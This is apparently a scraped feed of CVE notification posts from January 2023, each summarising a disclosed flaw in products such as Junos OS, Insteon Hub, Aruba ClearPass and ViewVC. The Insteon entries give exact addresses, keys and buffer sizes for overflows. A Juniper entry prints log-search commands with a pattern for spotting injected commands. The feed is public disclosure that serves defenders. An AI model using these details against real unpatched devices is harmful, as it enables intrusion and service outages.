🚨 CVE-2023-22417A Missing Release of Memory after Effective Lifetime vulnerability in the Flow Processing Daemon (flowd) of Juniper Networks Junos OS allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). In an IPsec VPN environment, a memory leak will be seen if a DH or ECDH group is configured. Eventually the flowd process will crash and restart. This issue affects Juniper Networks Junos OS on SRX Series: All versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S8, 19.4R3-S10; 20.2 versions prior to 20.2R3-S6; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S5; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2.🎖@cveNotify |
|
| 2023-01-13 02:29:37 |
🚨 CVE-2022-42704A cross-site scripting (XSS) vulnerability in Employee Service Center (esc) and Service Portal (sp) in ServiceNow Quebec, Rome, and San Diego allows remote attackers to inject arbitrary web script via the Standard Ticket Conversations widget.🎖@cveNotify |
|
| 2023-01-13 02:29:36 |
🚨 CVE-2022-46463An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication.🎖@cveNotify |
|
| 2023-01-13 02:29:35 |
🚨 CVE-2023-22391A vulnerability in class-of-service (CoS) queue management in Juniper Networks Junos OS on the ACX2K Series devices allows an unauthenticated network-based attacker to cause a Denial of Service (DoS). Specific packets are being incorrectly routed to a queue used for other high-priority traffic such as BGP, PIM, ICMP, ICMPV6 ND and ISAKMP. Due to this misclassification of traffic, receipt of a high rate of these specific packets will cause delays in the processing of other traffic, leading to a Denial of Service (DoS). Continued receipt of this amount of traffic will create a sustained Denial of Service (DoS) condition. This issue affects Juniper Networks Junos OS on ACX2K Series: All versions prior to 19.4R3-S9; All 20.2 versions; 20.3 versions prior to 20.3R3-S6 on ACX2K Series; 20.4 versions prior to 20.4R3-S4 on ACX2K Series; All 21.1 versions; 21.2 versions prior to 21.2R3-S3 on ACX2K Series. Note: This issues affects legacy ACX2K Series PPC-based devices. This platform reached Last Supported Version (LSV) as of the Junos OS 21.2 Release.🎖@cveNotify |
|
| 2023-01-13 00:29:40 |
🚨 CVE-2022-2484The signature check in the Nokia ASIK AirScale system module version 474021A.101 can be bypassed allowing an attacker to run modified firmware. This could result in the execution of a malicious kernel, arbitrary programs, or modified Nokia programs.🎖@cveNotify |
|
| 2023-01-13 00:29:39 |
🚨 CVE-2022-2483The bootloader in the Nokia ASIK AirScale system module (versions 474021A.101 and 474021A.102) loads public keys for firmware verification signature. If an attacker modifies the flash contents to corrupt the keys, secure boot could be permanently disabled on a given device.🎖@cveNotify |
|
| 2023-01-13 00:29:38 |
🚨 CVE-2022-39422Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.38. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-01-12 21:30:01 |
🚨 CVE-2022-40518Information disclosure due to buffer overread in Core🎖@cveNotify |
|
| 2023-01-12 21:30:00 |
🚨 CVE-2016-15014A vulnerability has been found in CESNET theme-cesnet up to 1.x and classified as problematic. Affected by this vulnerability is an unknown functionality of the file cesnet/core/lostpassword/templates/resetpassword.php. The manipulation leads to insufficiently protected credentials. Attacking locally is a requirement. Upgrading to version 2.0.0 is able to address this issue. The name of the patch is 2b857f2233ce5083b4d5bc9bfc4152f933c3e4a6. It is recommended to upgrade the affected component. The identifier VDB-217633 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-12 21:29:59 |
🚨 CVE-2016-15013A vulnerability was found in ForumHulp searchresults. It has been rated as critical. Affected by this issue is the function list_keywords of the file event/listener.php. The manipulation of the argument word leads to sql injection. The name of the patch is dd8a312bb285ad9735a8e1da58e9e955837b7322. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217628.🎖@cveNotify |
|
| 2023-01-12 21:29:57 |
🚨 CVE-2021-4307A vulnerability was found in Yomguithereal Baobab up to 2.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack can be launched remotely. Upgrading to version 2.6.1 is able to address this issue. The name of the patch is c56639532a923d9a1600fb863ec7551b188b5d19. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217627.🎖@cveNotify |
|
| 2023-01-12 21:29:56 |
🚨 CVE-2022-23549Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 2.9.0.beta16 on the `beta` and `tests-passed` branches, users can create posts with raw body longer than the `max_length` site setting by including html comments that are not counted toward the character limit. This issue is patched in versions 2.8.14 and 2.9.0.beta16. There are no known workarounds.🎖@cveNotify |
|
| 2023-01-12 21:29:55 |
🚨 CVE-2020-36646A vulnerability classified as problematic has been found in MediaArea ZenLib up to 0.4.38. This affects the function Ztring::Date_From_Seconds_1970_Local of the file Source/ZenLib/Ztring.cpp. The manipulation of the argument Value leads to unchecked return value to null pointer dereference. Upgrading to version 0.4.39 is able to address this issue. The name of the patch is 6475fcccd37c9cf17e0cfe263b5fe0e2e47a8408. It is recommended to upgrade the affected component. The identifier VDB-217629 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-12 21:29:54 |
🚨 CVE-2014-125063A vulnerability was found in ada-l0velace Bid and classified as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The name of the patch is abd71140b8219fa8741d0d8a57ab27d5bfd34222. It is recommended to apply a patch to fix this issue. The identifier VDB-217625 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-12 21:29:53 |
🚨 CVE-2015-10027A vulnerability, which was classified as problematic, has been found in hydrian TTRSS-Auth-LDAP. Affected by this issue is some unknown functionality of the component Username Handler. The manipulation leads to ldap injection. Upgrading to version 2.0b1 is able to address this issue. The name of the patch is a7f7a5a82d9202a5c40d606a5c519ba61b224eb8. It is recommended to upgrade the affected component. VDB-217622 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-12 21:29:52 |
🚨 CVE-2017-20164A vulnerability was found in Symbiote Seed up to 6.0.2. It has been classified as critical. Affected is the function onBeforeSecurityLogin of the file code/extensions/SecurityLoginExtension.php of the component Login. The manipulation of the argument URL leads to open redirect. It is possible to launch the attack remotely. Upgrading to version 6.0.3 is able to address this issue. The name of the patch is b065ebd82da53009d273aa7e989191f701485244. It is recommended to upgrade the affected component. VDB-217626 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-12 21:29:51 |
🚨 CVE-2022-40201Bentley Systems MicroStation Connect versions 10.17.0.209 and prior are vulnerable to a Stack-Based Buffer Overflow when a malformed design (DGN) file is parsed. This may allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-01-12 21:29:50 |
🚨 CVE-2015-10028A vulnerability has been found in ss15-this-is-sparta and classified as problematic. This vulnerability affects unknown code of the file js/roomElement.js of the component Main Page. The manipulation leads to cross site scripting. The attack can be initiated remotely. The name of the patch is ba2f71ad3a46e5949ee0c510b544fa4ea973baaa. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217624.🎖@cveNotify |
|
| 2023-01-12 21:29:49 |
🚨 CVE-2023-22488Flarum is a forum software for building communities. Using the notifications feature, one can read restricted/private content and bypass access checks that would be in place for such content. The notification-sending component does not check that the subject of the notification can be seen by the receiver, and proceeds to send notifications through their different channels. The alerts do not leak data despite this as they are listed based on a visibility check, however, emails are still sent out. This means that, for extensions which restrict access to posts, any actor can bypass the restriction by subscribing to the discussion if the Subscriptions extension is enabled. The attack allows the leaking of some posts in the forum database, including posts awaiting approval, posts in tags the user has no access to if they could subscribe to a discussion before it becomes private, and posts restricted by third-party extensions. All Flarum versions prior to v1.6.3 are affected. The vulnerability has been fixed and published as flarum/core v1.6.3. All communities running Flarum should upgrade as soon as possible to v1.6.3. As a workaround, disable the Flarum Subscriptions extension or disable email notifications altogether. There are no other supported workarounds for this issue for Flarum versions below 1.6.3.🎖@cveNotify |
|
| 2023-01-12 21:29:48 |
🚨 CVE-2022-41613Bentley Systems MicroStation Connect versions 10.17.0.209 and prior are vulnerable to an Out-of-Bounds Read when when parsing DGN files, which may allow an attacker to crash the product, disclose sensitive information, or execute arbitrary code.🎖@cveNotify |
|
| 2023-01-12 21:29:47 |
🚨 CVE-2021-4306A vulnerability classified as problematic has been found in cronvel terminal-kit up to 2.1.7. Affected is an unknown function. The manipulation leads to inefficient regular expression complexity. Upgrading to version 2.1.8 is able to address this issue. The name of the patch is a2e446cc3927b559d0281683feb9b821e83b758c. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217620.🎖@cveNotify |
|
| 2023-01-12 21:29:45 |
🚨 CVE-2022-4881A vulnerability was found in CapsAdmin PAC3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file lua/pac3/core/shared/http.lua. The manipulation of the argument url leads to cross site scripting. The attack may be launched remotely. The name of the patch is 8fc9e12dfa21d757be6eb4194c763e848b299ac0. It is recommended to apply a patch to fix this issue. VDB-217646 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-12 21:29:44 |
🚨 CVE-2014-125059A vulnerability, which was classified as problematic, has been found in sternenseemann sternenblog. This issue affects the function blog_index of the file main.c. The manipulation of the argument post_path leads to file inclusion. The attack may be initiated remotely. Upgrading to version 0.1.0 is able to address this issue. The name of the patch is cf715d911d8ce17969a7926dea651e930c27e71a. It is recommended to upgrade the affected component. The identifier VDB-217613 was assigned to this vulnerability. NOTE: This case is rather theoretical and probably won't happen. Maybe only on obscure Web servers.🎖@cveNotify |
|
| 2023-01-12 21:29:43 |
🚨 CVE-2022-32849An information disclosure issue was addressed by removing the vulnerable code. This issue is fixed in iOS 15.6 and iPadOS 15.6, macOS Big Sur 11.6.8, tvOS 15.6, macOS Monterey 12.5, Security Update 2022-005 Catalina. An app may be able to access sensitive user information.🎖@cveNotify |
|
| 2023-01-12 21:29:42 |
🚨 CVE-2022-32814A type confusion issue was addressed with improved state handling. This issue is fixed in watchOS 8.7, tvOS 15.6, iOS 15.6 and iPadOS 15.6, macOS Monterey 12.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-01-12 21:29:41 |
🚨 CVE-2022-2666A vulnerability has been found in SourceCodester Loan Management System and classified as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-205618 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-12 21:29:40 |
🚨 CVE-2022-1102A vulnerability classified as problematic has been found in SourceCodester Royale Event Management System 1.0. Affected is an unknown function of the file /royal_event/companyprofile.php. The manipulation of the argument companyname/regno/companyaddress/companyemail leads to cross site scripting. It is possible to launch the attack remotely. VDB-195786 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-12 01:29:35 |
🚨 CVE-2022-4344Memory exhaustion in the Kafka protocol dissector in Wireshark 4.0.0 to 4.0.1 and 3.6.0 to 3.6.9 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-01-11 23:29:57 |
🚨 CVE-2017-16277Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd sn_grp, at 0x9d017658, the value for the `gcmd` key is copied using `strcpy` to the buffer at `$sp+0x270`.This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-11 23:29:56 |
🚨 CVE-2017-16268Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_b, at 0x9d0165c0, the value for the `id` key is copied using `strcpy` to the buffer at `$sp+0x270`.This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-11 23:29:55 |
🚨 CVE-2017-16280Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_net, at 0x9d0181ec, the value for the `gate` key is copied using `strcpy` to the buffer at `$sp+0x290`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-11 23:29:54 |
🚨 CVE-2017-16271Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd e_l, at 0x9d016c94, the value for the `as_c` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-11 23:29:50 |
🚨 CVE-2017-16300Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd sn_ex, at 0x9d01ac74, the value for the `id` key is copied using `strcpy` to the buffer at `$sp+0x290`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-11 23:29:49 |
🚨 CVE-2017-16301Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd sn_ex, at 0x9d01ad14, the value for the `flg` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-11 23:29:48 |
🚨 CVE-2017-16286Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_time, at 0x9d018ea0, the value for the `dststart` key is copied using `strcpy` to the buffer at `$sp+0x280`.This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-11 23:29:44 |
🚨 CVE-2017-16279Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_net, at 0x9d0181a4, the value for the `port` key is copied using `strcpy` to the buffer at `$sp+0x280`.This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-11 23:29:43 |
🚨 CVE-2017-16303Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd sn_ex, at 0x9d01addc, the value for the `cmd2` key is copied using `strcpy` to the buffer at `$sp+0x280`.This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-11 23:29:42 |
🚨 CVE-2017-16309Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd sn_exw, at 0x9d01b3d8, the value for the `d` key is copied using `strcpy` to the buffer at `$sp+0x334`.This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-11 23:29:38 |
🚨 CVE-2017-16310Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_ch, at 0x9d01b7b0, the value for the `ch` key is copied using `strcpy` to the buffer at `$sp+0x334`.This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-11 23:29:37 |
🚨 CVE-2017-16290Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_sun, at 0x9d01980c, the value for the `sunrise` key is copied using `strcpy` to the buffer at `$sp+0x2d0`.This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-11 23:29:36 |
🚨 CVE-2017-16291Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_sun, at 0x9d019854, the value for the `sunset` key is copied using `strcpy` to the buffer at `$sp+0x334`.This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-11 22:29:44 |
🚨 CVE-2023-22492ZITADEL is a combination of Auth0 and Keycloak. RefreshTokens is an OAuth 2.0 feature that allows applications to retrieve new access tokens and refresh the user's session without the need for interacting with a UI. RefreshTokens were not invalidated when a user was locked or deactivated. The deactivated or locked user was able to obtain a valid access token only through a refresh token grant. When the locked or deactivated user’s session was already terminated (“logged out”) then it was not possible to create a new session. Renewal of access token through a refresh token grant is limited to the configured amount of time (RefreshTokenExpiration). As a workaround, ensure the RefreshTokenExpiration in the OIDC settings of your instance is set according to your security requirements. This issue has been patched in versions 2.17.3 and 2.16.4.🎖@cveNotify |
|
| 2023-01-11 22:29:43 |
🚨 CVE-2022-47659GPAC MP4box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to Buffer Overflow in gf_bs_read_data🎖@cveNotify |
|
| 2023-01-11 22:29:42 |
🚨 CVE-2014-125076A vulnerability was found in NoxxieNl Criminals. It has been classified as critical. Affected is an unknown function of the file ingame/roulette.php. The manipulation of the argument gambleMoney leads to sql injection. The name of the patch is 0a60b31271d4cbf8babe4be993d2a3a1617f0897. It is recommended to apply a patch to fix this issue. VDB-218022 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-11 22:29:38 |
🚨 CVE-2015-10039A vulnerability was found in dobos domino. It has been rated as critical. Affected by this issue is some unknown functionality in the library src/Complex.Domino.Lib/Lib/EntityFactory.cs. The manipulation leads to sql injection. Upgrading to version 0.1.5524.38553 is able to address this issue. The name of the patch is 16f039073709a21a76526110d773a6cce0ce753a. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218024.🎖@cveNotify |
|
| 2023-01-11 22:29:37 |
🚨 CVE-2022-34335IBM Sterling Partner Engagement Manager 6.1.2, 6.2.0, and 6.2.1 could allow an authenticated user to exhaust server resources which could lead to a denial of service. IBM X-Force ID: 229705.🎖@cveNotify |
|
| 2023-01-11 22:29:36 |
🚨 CVE-2022-40615IBM Sterling Partner Engagement Manager 6.1, 6.2, and 6.2.1 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 236208.🎖@cveNotify |
|
| 2023-01-11 20:29:48 |
🚨 CVE-2020-1631A vulnerability in the HTTP/HTTPS service used by J-Web, Web Authentication, Dynamic-VPN (DVPN), Firewall Authentication Pass-Through with Web-Redirect, and Zero Touch Provisioning (ZTP) allows an unauthenticated attacker to perform local file inclusion (LFI) or path traversal. Using this vulnerability, an attacker may be able to inject commands into the httpd.log, read files with 'world' readable permission file or obtain J-Web session tokens. In the case of command injection, as the HTTP service runs as user 'nobody', the impact of this command injection is limited. (CVSS score 5.3, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) In the case of reading files with 'world' readable permission, in Junos OS 19.3R1 and above, the unauthenticated attacker would be able to read the configuration file. (CVSS score 5.9, vector CVSS:3.1/ AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) If J-Web is enabled, the attacker could gain the same level of access of anyone actively logged into J-Web. If an administrator is logged in, the attacker could gain administrator access to J-Web. (CVSS score 8.8, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) This issue only affects Juniper Networks Junos OS devices with HTTP/HTTPS services enabled. Junos OS devices with HTTP/HTTPS services disabled are not affected. If HTTP/HTTPS services are enabled, the following command will show the httpd processes: user@device> show system processes | match http 5260 - S 0:00.13 /usr/sbin/httpd-gk -N 5797 - I 0:00.10 /usr/sbin/httpd --config /jail/var/etc/httpd.conf To summarize: If HTTP/HTTPS services are disabled, there is no impact from this vulnerability. If HTTP/HTTPS services are enabled and J-Web is not in use, this vulnerability has a CVSS score of 5.9 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). If J-Web is enabled, this vulnerability has a CVSS score of 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). Juniper SIRT has received a single report of this vulnerability being exploited in the wild. Out of an abundance of caution, we are notifying customers so they can take appropriate actions. Indicators of Compromise: The /var/log/httpd.log may have indicators that commands have injected or files being accessed. The device administrator can look for these indicators by searching for the string patterns "=*;*&" or "*%3b*&" in /var/log/httpd.log, using the following command: user@device> show log httpd.log | match "=*;*&|=*%3b*&" If this command returns any output, it might be an indication of malicious attempts or simply scanning activities. Rotated logs should also be reviewed, using the following command: user@device> show log httpd.log.0.gz | match "=*;*&|=*%3b*&" user@device> show log httpd.log.1.gz | match "=*;*&|=*%3b*&" Note that a skilled attacker would likely remove these entries from the local log file, thus effectively eliminating any reliable signature that the device had been attacked. This issue affects Juniper Networks Junos OS 12.3 versions prior to 12.3R12-S16; 12.3X48 versions prior to 12.3X48-D101, 12.3X48-D105; 14.1X53 versions prior to 14.1X53-D54; 15.1 versions prior to 15.1R7-S7; 15.1X49 versions prior to 15.1X49-D211, 15.1X49-D220; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R2-S7, 18.2R3-S4; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R1-S7, 18.4R3-S2 ; 18.4 version 18.4R2 and later versions; 19.1 versions prior to 19.1R1-S5, 19.1R3-S1; 19.1 version 19.1R2 and later versions; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2; 20.1 versions prior to 20.1R1-S1, 20.1R2.🎖@cveNotify |
|
| 2023-01-11 20:29:47 |
🚨 CVE-2022-40615IBM Sterling Partner Engagement Manager 6.1, 6.2, and 6.2.1 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 236208.🎖@cveNotify |
|
| 2023-01-11 20:29:46 |
🚨 CVE-2022-4457Due to a misconfiguration in the manifest file of the WARP client for Android, it was possible to a perform a task hijacking attack. An attacker could create a malicious mobile application which could hijack legitimate app and steal potentially sensitive information when installed on the victim's device.🎖@cveNotify |
|
| 2023-01-11 20:29:42 |
🚨 CVE-2021-3612An out-of-bounds memory write flaw was found in the Linux kernel's joystick devices subsystem in versions before 5.9-rc1, in the way the user calls ioctl JSIOCSBTNMAP. This flaw allows a local user to crash the system or possibly escalate their privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.🎖@cveNotify |
|
| 2023-01-11 20:29:41 |
🚨 CVE-2021-4303A vulnerability, which was classified as problematic, has been found in shannah Xataface up to 2.x. Affected by this issue is the function testftp of the file install/install_form.js.php of the component Installer. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 3.0.0 is able to address this issue. The name of the patch is 94143a4299e386f33bf582139cd4702571d93bde. It is recommended to upgrade the affected component. VDB-217442 is the identifier assigned to this vulnerability. NOTE: Installer is disabled by default.🎖@cveNotify |
|
| 2023-01-11 20:29:40 |
🚨 CVE-2022-4869A vulnerability was found in Evolution Events Artaxerxes. It has been declared as problematic. This vulnerability affects unknown code of the file arta/common/middleware.py of the component POST Parameter Handler. The manipulation of the argument password leads to information disclosure. The attack can be initiated remotely. The name of the patch is 022111407d34815c16c6eada2de69ca34084dc0d. It is recommended to apply a patch to fix this issue. VDB-217438 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-11 18:30:19 |
🚨 CVE-2022-43536Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. Successful exploits could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in Aruba ClearPass Policy Manager version(s): ClearPass Policy Manager 6.10.x: 6.10.7 and below and ClearPass Policy Manager 6.9.x: 6.9.12 and below.🎖@cveNotify |
|
| 2023-01-11 18:30:18 |
🚨 CVE-2022-43535A vulnerability in the ClearPass OnGuard Windows agent could allow malicious users on a Windows instance to elevate their user privileges. A successful exploit could allow these users to execute arbitrary code with NT AUTHORITY\SYSTEM level privileges on the Windows instance in Aruba ClearPass Policy Manager version(s): ClearPass Policy Manager 6.10.x: 6.10.7 and below and ClearPass Policy Manager 6.9.x: 6.9.12 and below.🎖@cveNotify |
|
| 2023-01-11 18:30:17 |
🚨 CVE-2023-22456ViewVC, a browser interface for CVS and Subversion version control repositories, as a cross-site scripting vulnerability that affects versions prior to 1.2.2 and 1.1.29. The impact of this vulnerability is mitigated by the need for an attacker to have commit privileges to a Subversion repository exposed by an otherwise trusted ViewVC instance. The attack vector involves files with unsafe names (names that, when embedded into an HTML stream, would cause the browser to run unwanted code), which themselves can be challenging to create. Users should update to at least version 1.2.2 (if they are using a 1.2.x version of ViewVC) or 1.1.29 (if they are using a 1.1.x version). ViewVC 1.0.x is no longer supported, so users of that release lineage should implement a workaround. Users can edit their ViewVC EZT view templates to manually HTML-escape changed paths during rendering. Locate in your template set's `revision.ezt` file references to those changed paths, and wrap them with `[format "html"]` and `[end]`. For most users, that means that references to `[changes.path]` will become `[format "html"][changes.path][end]`. (This workaround should be reverted after upgrading to a patched version of ViewVC, else changed path names will be doubly escaped.)🎖@cveNotify |
|
| 2023-01-11 18:30:16 |
🚨 CVE-2022-43528Under certain configurations, an attacker can login to Aruba EdgeConnect Enterprise Orchestrator without supplying a multi-factor authentication code. Successful exploitation allows an attacker to login using only a username and password and successfully bypass MFA requirements in Aruba EdgeConnect Enterprise Orchestration Software version(s): Aruba EdgeConnect Enterprise Orchestrator (on-premises), Aruba EdgeConnect Enterprise Orchestrator-as-a-Service, Aruba EdgeConnect Enterprise Orchestrator-SP and Aruba EdgeConnect Enterprise Orchestrator Global Enterprise Tenant Orchestrators - Orchestrator 9.2.1.40179 and below, - Orchestrator 9.1.4.40436 and below, - Orchestrator 9.0.7.40110 and below, - Orchestrator 8.10.23.40015 and below, - Any older branches of Orchestrator not specifically mentioned.🎖@cveNotify |
|
| 2023-01-11 18:30:15 |
🚨 CVE-2023-22464ViewVC is a browser interface for CVS and Subversion version control repositories. Versions prior to 1.2.3 and 1.1.30 are vulnerable to cross-site scripting. The impact of this vulnerability is mitigated by the need for an attacker to have commit privileges to a Subversion repository exposed by an otherwise trusted ViewVC instance. The attack vector involves files with unsafe names (names that, when embedded into an HTML stream, would cause the browser to run unwanted code), which themselves can be challenging to create. Users should update to at least version 1.2.3 (if they are using a 1.2.x version of ViewVC) or 1.1.30 (if they are using a 1.1.x version). ViewVC 1.0.x is no longer supported, so users of that release lineage should implement one of the following workarounds. Users can edit their ViewVC EZT view templates to manually HTML-escape changed path "copyfrom paths" during rendering. Locate in your template set's `revision.ezt` file references to those changed paths, and wrap them with `[format "html"]` and `[end]`. For most users, that means that references to `[changes.copy_path]` will become `[format "html"][changes.copy_path][end]`. (This workaround should be reverted after upgrading to a patched version of ViewVC, else "copyfrom path" names will be doubly escaped.)🎖@cveNotify |
|
| 2023-01-11 18:30:13 |
